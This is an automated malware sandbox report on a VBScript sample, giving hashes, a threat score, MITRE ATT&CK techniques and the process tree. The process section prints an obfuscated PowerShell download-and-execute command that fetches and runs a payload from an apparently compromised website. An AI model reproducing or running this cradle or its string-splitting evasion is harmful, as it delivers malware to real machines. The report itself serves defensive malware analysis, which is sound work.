2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19-10-2024 07:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WWjjNTGdMh.vbs
Size

12KB
MD5

75f80ac848e2c5c71c5fc4960da7a430
SHA1

abcd9316f8a1251220db81d4d075ae659a0fb790
SHA256

2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd
SHA512

af4db86a398ac31f3b7d909ed62c8ea6b3672db933deadf32ae74e3dac581816372bfb0fc113f5b1aab462291d560516cadd52c655eebd79b7f639467c2c0ce1
SSDEEP

48:UvvvvvvvvvvviddddddddddFP5+31HtwLhLtz/zzUSAzzzzzzzzzzzzzzzzzzzze:UvvvvvvvvvvviddddddddddZagKoJ

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2416 powershell.exe
6 2416 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2416 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2416 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2416 powershell.exe

flow	pid	process
5	2416	powershell.exe
6	2416	powershell.exe

pid	process
2416	powershell.exe

pid	process
2416	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2416	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 2268 wrote to memory of 2416	2268	WScript.exe	powershell.exe
PID 2268 wrote to memory of 2416	2268	WScript.exe	powershell.exe
PID 2268 wrote to memory of 2416	2268	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WWjjNTGdMh.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4(''https://totalhorsehealth.com/wp-admin/images/images/img.jpg'')'.Replace('t4','adString');IEX($t1+$t2+$t3)
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2416-4-0x000007FEF5C8E000-0x000007FEF5C8F000-memory.dmp

Filesize
4KB

Download
memory/2416-7-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2416-6-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2416-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2416-8-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2416-9-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2416-10-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2416-11-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download
memory/2416-12-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

Filesize
9.6MB

Download